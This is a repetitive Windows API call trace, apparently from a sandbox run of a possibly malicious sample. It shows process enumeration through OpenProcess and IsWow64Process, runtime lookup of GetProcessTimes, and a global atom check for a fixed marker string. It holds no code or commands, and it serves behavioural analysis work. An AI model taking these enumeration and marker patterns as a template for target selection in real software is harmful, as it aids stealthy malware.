	[0124.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.132] CloseHandle (hObject=0x69c) returned 1
	[0124.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.132] CloseHandle (hObject=0x69c) returned 1
	[0124.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.132] CloseHandle (hObject=0x69c) returned 1
	[0124.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.132] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.132] CloseHandle (hObject=0x69c) returned 1
	[0124.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.133] CloseHandle (hObject=0x69c) returned 1
	[0124.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.133] CloseHandle (hObject=0x69c) returned 1
	[0124.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.133] CloseHandle (hObject=0x69c) returned 1
	[0124.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.133] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.133] CloseHandle (hObject=0x69c) returned 1
	[0124.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.134] CloseHandle (hObject=0x69c) returned 1
	[0124.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.134] CloseHandle (hObject=0x69c) returned 1
	[0124.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.134] CloseHandle (hObject=0x69c) returned 1
	[0124.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.134] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.134] CloseHandle (hObject=0x69c) returned 1
	[0124.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.135] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.135] CloseHandle (hObject=0x69c) returned 1
	[0124.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.135] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.135] CloseHandle (hObject=0x69c) returned 1
	[0124.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.135] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.135] CloseHandle (hObject=0x69c) returned 1
	[0124.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.136] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.136] CloseHandle (hObject=0x69c) returned 1
	[0124.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.136] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.136] CloseHandle (hObject=0x69c) returned 1
	[0124.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.136] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.136] CloseHandle (hObject=0x69c) returned 1
	[0124.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.136] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.136] CloseHandle (hObject=0x69c) returned 1
	[0124.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.136] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.137] CloseHandle (hObject=0x69c) returned 1
	[0124.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.137] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.137] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.137] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.138] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.139] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.139] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.139] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.139] CloseHandle (hObject=0x69c) returned 1
	[0124.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.139] CloseHandle (hObject=0x69c) returned 1
	[0124.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.139] CloseHandle (hObject=0x69c) returned 1
	[0124.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.140] CloseHandle (hObject=0x69c) returned 1
	[0124.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.140] CloseHandle (hObject=0x69c) returned 1
	[0124.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.140] CloseHandle (hObject=0x69c) returned 1
	[0124.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.173] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.175] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.177] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.177] CloseHandle (hObject=0x69c) returned 1
	[0124.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.177] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.177] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.177] CloseHandle (hObject=0x69c) returned 1
	[0124.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.178] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.178] CloseHandle (hObject=0x69c) returned 1
	[0124.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.178] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.178] CloseHandle (hObject=0x69c) returned 1
	[0124.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.178] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.178] CloseHandle (hObject=0x69c) returned 1
	[0124.178] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.178] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.178] CloseHandle (hObject=0x69c) returned 1
	[0124.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.179] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.179] CloseHandle (hObject=0x69c) returned 1
	[0124.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.179] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.179] CloseHandle (hObject=0x69c) returned 1
	[0124.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.179] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.179] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.179] CloseHandle (hObject=0x69c) returned 1
	[0124.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.180] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.180] CloseHandle (hObject=0x69c) returned 1
	[0124.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0124.180] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.180] CloseHandle (hObject=0x69c) returned 1
	[0124.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.180] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.180] CloseHandle (hObject=0x69c) returned 1
	[0124.180] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.180] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.180] CloseHandle (hObject=0x69c) returned 1
	[0124.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.181] CloseHandle (hObject=0x69c) returned 1
	[0124.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.181] CloseHandle (hObject=0x69c) returned 1
	[0124.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0124.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.181] CloseHandle (hObject=0x69c) returned 1
	[0124.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0124.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.181] CloseHandle (hObject=0x69c) returned 1
	[0124.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0124.181] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.181] CloseHandle (hObject=0x69c) returned 1
	[0124.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0124.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.182] CloseHandle (hObject=0x69c) returned 1
	[0124.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0124.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.182] CloseHandle (hObject=0x69c) returned 1
	[0124.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0124.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.182] CloseHandle (hObject=0x69c) returned 1
	[0124.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0124.182] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.182] CloseHandle (hObject=0x69c) returned 1
	[0124.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0124.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.183] CloseHandle (hObject=0x69c) returned 1
	[0124.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0124.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.183] CloseHandle (hObject=0x69c) returned 1
	[0124.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0124.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.183] CloseHandle (hObject=0x69c) returned 1
	[0124.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0124.183] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.183] CloseHandle (hObject=0x69c) returned 1
	[0124.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0124.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.184] CloseHandle (hObject=0x69c) returned 1
	[0124.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0124.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.184] CloseHandle (hObject=0x69c) returned 1
	[0124.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0124.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.184] CloseHandle (hObject=0x69c) returned 1
	[0124.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.184] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.184] CloseHandle (hObject=0x69c) returned 1
	[0124.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0124.185] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.185] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.185] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.186] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.186] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.186] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.186] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.186] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.187] CloseHandle (hObject=0x69c) returned 1
	[0124.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0124.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.187] CloseHandle (hObject=0x69c) returned 1
	[0124.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0124.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.187] CloseHandle (hObject=0x69c) returned 1
	[0124.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0124.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.187] CloseHandle (hObject=0x69c) returned 1
	[0124.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0124.187] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.187] CloseHandle (hObject=0x69c) returned 1
	[0124.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0124.188] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.188] CloseHandle (hObject=0x69c) returned 1
	[0124.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0124.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0124.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0124.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0124.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0124.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0124.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0124.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0124.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0124.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0124.223] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.223] CloseHandle (hObject=0x69c) returned 1
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0124.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0124.223] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.223] CloseHandle (hObject=0x69c) returned 1
	[0124.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0124.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0124.224] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.224] CloseHandle (hObject=0x69c) returned 1
	[0124.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0124.224] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.224] CloseHandle (hObject=0x69c) returned 1
	[0124.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0124.224] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.224] CloseHandle (hObject=0x69c) returned 1
	[0124.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0124.224] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.225] CloseHandle (hObject=0x69c) returned 1
	[0124.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0124.225] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.225] CloseHandle (hObject=0x69c) returned 1
	[0124.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0124.225] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.225] CloseHandle (hObject=0x69c) returned 1
	[0124.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0124.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0124.226] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.226] CloseHandle (hObject=0x69c) returned 1
	[0124.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0124.226] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.226] CloseHandle (hObject=0x69c) returned 1
	[0124.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0124.226] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.226] CloseHandle (hObject=0x69c) returned 1
	[0124.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0124.226] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.226] CloseHandle (hObject=0x69c) returned 1
	[0124.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0124.227] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.227] CloseHandle (hObject=0x69c) returned 1
	[0124.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0124.227] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.227] CloseHandle (hObject=0x69c) returned 1
	[0124.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0124.227] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.227] CloseHandle (hObject=0x69c) returned 1
